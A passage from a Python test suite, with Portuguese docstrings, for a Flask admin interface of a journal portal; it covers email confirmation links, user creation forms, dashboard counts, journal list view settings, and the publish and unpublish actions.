self.assertIsNotNone(email_confirmation_url_with_token)
self.assertFalse(email_confirmation_url_with_token == '')
def test_open_confirm_url_with_token_sent_via_email_open_the_correct_page(self):
"""
Com:
- o usuário 'administrador' logado (email confirmado)
- um novo usuário, com email NÃO confirmado
Quando:
1. enviamos emails de confirmação (utilizando a ação do admin/user)
2. acesssamos o link enviado por email
Verificamos:
- que o email enviado contem um link para confirmar email.
- após acessar o link, a página é a correta.
- após acessar o link, a págian mostra a notificação de operação ok.
- após acessar o link, o usuário tem seu email confirmado.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
normal_user = {
'email': 'foo@bar.com',
'password': '123'
}
create_user(normal_user['email'], normal_user['password'], False)
login_url = url_for('admin.login_view')
action_payload = {
'action': 'confirm_email',
'rowid': get_user_by_email(normal_user['email']).id,
'url': '/admin/user/'
}
expected_msg = u'Email: %s confirmado com sucesso!' % normal_user['email']
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
# login do usuario admin
login_response = c.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# requisição da ação para enviar email de confirmação
with mail.record_messages() as outbox:
action_response = c.post(
'/admin/user/action/',
data=action_payload,
follow_redirects=True)
# then
self.assertStatus(action_response, 200)
# temos um email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# pegamos o link com token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# temos a url com o token
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
# acessamos o link do email
confirmation_response = c.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 200)
self.assertTemplateUsed('admin/index.html')
# confirmação com sucesso
self.assertIn(expected_msg, confirmation_response.data.decode('utf-8'))
# confirmamos alteração do usuário
user = get_user_by_email(normal_user['email'])
self.assertTrue(user.email_confirmed)
def test_email_confimation_token_of_invalid_user_raise_404_error_message(self):
"""
Com:
- email de usuário que não existe no sistema.
Quando:
1. enviamos emails de confirmação (utilizando diretamente notifications.py)
2. acesssamos o link enviado por email
Verificamos:
- que o email enviado contem um link para confirmar email.
- após acessar o link, a página mostra o erro 404 com a mensagem certa.
"""
# with
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as c:
fake_user_email = u'foo@bar.com'
# when
with mail.record_messages() as outbox:
send_confirmation_email(fake_user_email)
# then
# temos um email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# pegamos o link com token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# temos a url com o token
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
# acessamos o link do email
confirmation_response = c.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 404)
self.assertTemplateUsed('errors/404.html')
error_msg = self.get_context_variable('message')
self.assertEqual(error_msg, error_msg)
@unittest.skip("Login form no lugar de um UserForm, pq?")
def test_create_user_from_admin_page_creates_a_new_user(self):
"""
Com:
- usuario administrador (com email confirmado)
Quando:
1. acessamos /admin e cadastramos um novo usuário
2. acesssamos o link enviado por email
Verificamos:
- o usuário é criado.
- o usuário administrador é notificodo do sucesso da operação.
- o novo usuário não tem email confirmado.
- o novo usuário é notificado por email para confirmar email.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
new_user = {
'email': 'foo@bar.com',
'password': '123'
}
login_url = url_for('admin.login_view')
create_user_url = '/admin/user/new/'
# expected_msgs = [
# u'Enviamos o email de confirmação para: %s' % new_user['email'],
# u'Registro criado com sucesso.',
# ]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with mail.record_messages() as outbox:
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# requisição da ação para enviar email de confirmação
create_user_response = client.post(
create_user_url,
data={'email': new_user['email']},
follow_redirects=True)
# then
self.assertStatus(create_user_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# for msg in expected_msgs:
# self.assertIn(msg, action_response.data.decode('utf-8'))
# temos um email
self.assertEqual(1, len(outbox))
email_msg = outbox[0]
# pegamos o link com token
links_found = email_confirm_url_pattern.findall(email_msg.html)
# tem pelo menos 1 link, e tem só um link para o reset/password com token
self.assertGreaterEqual(1, len(links_found))
email_confirmation_url_with_token = [url for url in links_found if '/admin/confirm/' in url]
# temos a url com o token
self.assertEqual(1, len(email_confirmation_url_with_token))
email_confirmation_url_with_token = email_confirmation_url_with_token[0]
self.assertIsNotNone(email_confirmation_url_with_token)
self.assertFalse(email_confirmation_url_with_token == '')
# acessamos o link do email
user = get_user_by_email(new_user['email'])
confirmation_response = self.client.get(email_confirmation_url_with_token, follow_redirects=True)
self.assertStatus(confirmation_response, 200)
self.assertTemplateUsed('admin/index.html')
# confirmação com sucesso
# self.assertIn(expected_msg, confirmation_response.data.decode('utf-8'))
# confirmamos alteração do usuário
self.assertTrue(user.email_confirmed)
@unittest.skip("Login form no lugar de um UserForm, pq?")
def test_try_to_create_user_without_email_must_raise_error_notification(self):
"""
Com:
- usuario administrador (com email confirmado)
Quando:
1. acessamos /admin
2. tentamos cadastrar um novo usuário, ** sem inserir email **
Verificamos:
- o usuário não é criado.
- o usuário administrado é notificodo do erro da operação.
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
# new_user = {
# 'email': 'foo@bar.com',
# 'password': '123'
# }
login_url = url_for('admin.login_view')
create_user_url = '/admin/user/new/'
expected_form_error = {'email': [u'This field is required.']}
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with mail.record_messages() as outbox:
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# "preencher" from sem o email do novo usuário
create_user_response = client.post(
create_user_url,
data={'email': ''},
follow_redirects=True)
# then
self.assertStatus(create_user_response, 200)
self.assertTemplateUsed('admin/model/create.html')
# tem erro no formulario
context_form = self.get_context_variable('form')
self.assertEqual(expected_form_error, context_form.errors)
# não temos email
self.assertEqual(0, len(outbox))
# TEST ADMIN INDEX #
def test_admin_index_content_counts_is_ok(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina /admin
Verificamos:
- que a contagem de documentos (periódicos, números e artigos) totais esta certa.
- que a contagem de documentos (periódicos, números e artigos) publicadas esta certa.
"""
# with
j_pub = makeOneJournal({'is_public': True})
makeOneJournal({'is_public': False})
i_pub = makeOneIssue({'is_public': True, 'journal': j_pub})
makeOneIssue({'is_public': False, 'journal': j_pub})
makeOneArticle({'is_public': True, 'journal': j_pub, 'issue': i_pub})
makeOneArticle({'is_public': False, 'journal': j_pub, 'issue': i_pub})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# then
counts = self.get_context_variable('counts')
count_keys = [
'journals_total_count',
'journals_public_count',
'issues_total_count',
'issues_public_count',
'articles_total_count',
'articles_public_count',
]
for k in count_keys:
self.assertIn(k, count_keys)
# contagem de periódicos
journals_total_count = counts['journals_total_count']
self.assertEqual(2, journals_total_count)
journals_public_count = counts['journals_public_count']
self.assertEqual(1, journals_public_count)
# contagem de números
issues_total_count = counts['issues_total_count']
self.assertEqual(2, issues_total_count)
issues_public_count = counts['issues_public_count']
self.assertEqual(1, issues_public_count)
# contagem de artigos
articles_total_count = counts['articles_total_count']
self.assertEqual(2, articles_total_count)
articles_public_count = counts['articles_public_count']
self.assertEqual(1, articles_public_count)
class JournalAdminViewTests(BaseTestCase):
def test_admin_journal_list_records(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco
Quando:
- fazemos login e
- acessamos a pagina /admin/journal/
Verificamos:
- o Journal criado deve estar listado nessa página
- e o template utilizado é o esperado
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de periódicos
journal_list_response = client.get(url_for('journal.index_view'))
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# verificamos a resposta
# que tem a id para acessar ao periódico
self.assertIn(journal.id, journal_list_response.data.decode('utf-8'))
def test_admin_journal_details(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do periódico: /admin/journal/details/
Verificamos:
- a pagina mostra o periódico certo
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_detail_url = url_for('journal.details_view', id=journal.id)
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
self.assertTemplateUsed('admin/index.html')
self.assertTrue(current_user.is_authenticated)
# acesso a aba de periódicos
journal_detail_response = client.get(journal_detail_url)
self.assertStatus(journal_detail_response, 200)
self.assertTemplateUsed('admin/model/details.html')
# then
# verificamos a resposta
# que tem a id para acessar ao periódico
self.assertIn(journal.id, journal_detail_response.data.decode('utf-8'))
def test_admin_journal_search_by_id(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco
Quando:
- fazemos login e
- acessamos a pagina de detalhe do periódico: /admin/journal/details/
- realizamos uma busca pelo id do periódico
Verificamos:
- a página mostra o periódico certo
"""
# with
journal = makeOneJournal()
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
journal_search_response = client.get(journal_index_url, data={'search': journal.id})
self.assertStatus(journal_search_response, 200)
# que tem a id para acessar ao periódico
self.assertIn(journal.id, journal_list_response.data.decode('utf-8'))
def test_admin_journal_check_column_filters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todos os column_filters esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_col_filters = [
'current_status',
'index_at',
'is_public',
'unpublish_reason'
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_filters = self.get_context_variable('admin_view').column_filters
self.assertEqual(len(expected_col_filters), len(column_filters))
for expected_col_filter in expected_col_filters:
self.assertIn(expected_col_filter, column_filters)
def test_admin_journal_check_searchable_columns(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todos os campos de busca esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_searchable_list = [
'_id', 'title', 'title_iso', 'short_title',
'print_issn', 'eletronic_issn', 'acronym',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_searchable_list = self.get_context_variable('admin_view').column_searchable_list
for expected_searchable_field in expected_column_searchable_list:
self.assertIn(expected_searchable_field, column_searchable_list)
def test_admin_journal_check_column_exclude_list(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todos os campos excluidos da listagem são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_exclude_list = [
'_id', 'jid', 'title_slug', 'timeline', 'subject_categories',
'study_areas', 'social_networks', 'title_iso', 'short_title',
'subject_descriptors', 'copyrighter', 'online_submission_url',
'cover_url', 'logo_url', 'previous_journal_ref',
'publisher_name', 'publisher_country', 'publisher_state',
'publisher_city', 'publisher_address', 'publisher_telephone',
'mission', 'index_at', 'sponsors', 'issue_count', 'other_titles',
'print_issn', 'eletronic_issn', 'unpublish_reason', 'url_segment',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_exclude_list = self.get_context_variable('admin_view').column_exclude_list
for expected_excluded_field in expected_column_exclude_list:
self.assertIn(expected_excluded_field, column_exclude_list)
def test_admin_journal_check_column_formatters(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todos os formatadores de campos como são os esperados
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_formatters = [
'created',
'updated',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_formatters = self.get_context_variable('admin_view').column_formatters
for expected_column_formatter in expected_column_formatters:
self.assertIn(expected_column_formatter, column_formatters.keys())
def test_admin_journal_check_column_labels_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_column_labels = [
'jid',
'collection',
'timeline',
'subject_categories',
'study_areas',
'social_networks',
'title',
'title_iso',
'short_title',
'created',
'updated',
'acronym',
'scielo_issn',
'print_issn',
'eletronic_issn',
'subject_descriptors',
'online_submission_url',
'cover_url',
'logo_url',
'other_titles',
'publisher_name',
'publisher_country',
'publisher_state',
'publisher_city',
'publisher_address',
'publisher_telephone',
'mission',
'index_at',
'sponsors',
'previous_journal_ref',
'current_status',
'issue_count',
'is_public',
'unpublish_reason',
'url_segment',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
column_labels = self.get_context_variable('admin_view').column_labels
for expected_column_label in expected_column_labels:
self.assertIn(expected_column_label, column_labels.keys())
def test_admin_journal_check_can_create_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite criar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_create = self.get_context_variable('admin_view').can_create
self.assertFalse(can_create)
def test_admin_journal_check_can_edit_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_edit = self.get_context_variable('admin_view').can_edit
self.assertFalse(can_edit)
def test_admin_journal_check_can_delete_is_false(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite apagar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_delete = self.get_context_variable('admin_view').can_delete
self.assertFalse(can_delete)
def test_admin_journal_check_create_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
create_modal = self.get_context_variable('admin_view').create_modal
self.assertTrue(create_modal)
def test_admin_journal_check_edit_modal_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
edit_modal = self.get_context_variable('admin_view').edit_modal
self.assertTrue(edit_modal)
def test_admin_journal_check_can_view_details_is_true(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que não permite editar registros
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
can_view_details = self.get_context_variable('admin_view').can_view_details
self.assertTrue(can_view_details)
def test_admin_journal_check_actions_defined(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
Verificamos:
- que contém todas as etiquetas de campos esperadas
"""
# with
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
expected_actions = [
'publish',
'unpublish_default',
]
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acesso a aba de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# verificamos os filtros da view
actions = [a[0] for a in self.get_context_variable('actions')]
self.assertEqual(len(expected_actions), len(actions))
for expected_action in expected_actions:
self.assertIn(expected_action, actions)
def test_admin_journal_action_publishing_an_unpublished_journal(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
- realizamos a ação de pubilcar
Verificamos:
- o periódico deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
journal = makeOneJournal({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
publish_action_url = '%saction/' % journal_index_url
expected_msg = u'Periódico(s) publicado(s) com sucesso!!'
# when
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# executamos ação publicar:
action_response = client.post(
publish_action_url,
data={
'url': journal_index_url,
'action': 'publish',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
def test_admin_journal_action_publishing_a_public_journal(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
- realizamos a ação de pubilcar
Verificamos:
- o periódico deve ficar como público
- o usuario é notificado do resultado da operação
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Periódico(s) publicado(s) com sucesso!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'publish',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertTrue(journal.is_public)
def test_admin_journal_action_unpublish_default_a_public_journal(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco (is_public=True)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
- realizamos a ação de despublicar (unpublish_default)
Verificamos:
- o periódico deve ficar despublicado
- o motivo de despublicação deve ser por: 'Conteúdo temporariamente indisponível'
- o usuario é notificado do resultado da operação
"""
# with
journal = makeOneJournal({'is_public': True})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = 'Periódico(s) despublicado com sucesso!!'
expected_reason = 'Conteúdo temporariamente indisponível'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'unpublish_default',
'rowid': journal.id,
},
follow_redirects=True
)
self.assertStatus(action_response, 200)
self.assertTemplateUsed('admin/model/list.html')
self.assertIn(expected_msg, action_response.data.decode('utf-8'))
journal.reload()
self.assertFalse(journal.is_public)
self.assertEqual(expected_reason, journal.unpublish_reason)
def test_admin_journal_action_publish_with_exception_raised_must_be_consistent(self):
"""
Com:
- usuário administrador cadastrado (com email confirmado)
- um novo registro do tipo: Journal no banco (is_public=False)
Quando:
- fazemos login e
- acessamos a pagina de listagem de periódicos: /admin/journal/
- realizamos a ação de publicacar, mas é levantada uma exceção no processo
Verificamos:
- o periódico deve ficar como não público (is_public=False)
- o usuario é notificado que houve um erro na operação
"""
# with
journal = makeOneJournal({'is_public': False})
admin_user = {
'email': 'admin@opac.org',
'password': 'foobarbaz',
}
create_user(admin_user['email'], admin_user['password'], True)
login_url = url_for('admin.login_view')
journal_index_url = url_for('journal.index_view')
action_url = '%saction/' % journal_index_url
expected_msg = u'Ocorreu um erro tentando publicar o(s) periódico(s)!!'
with current_app.app_context():
collection = makeOneCollection()
g.collection = collection
with current_app.test_request_context():
# when
with self.client as client:
# login do usuario admin
login_response = client.post(
login_url,
data=admin_user,
follow_redirects=True)
self.assertStatus(login_response, 200)
# acessamos a listagem de periódicos
journal_list_response = client.get(journal_index_url)
self.assertStatus(journal_list_response, 200)
self.assertTemplateUsed('admin/model/list.html')
# then
# executamos ação publicar:
with self.assertRaises(Exception):
action_response = client.post(
action_url,
data={
'url': journal_index_url,
'action': 'publish',
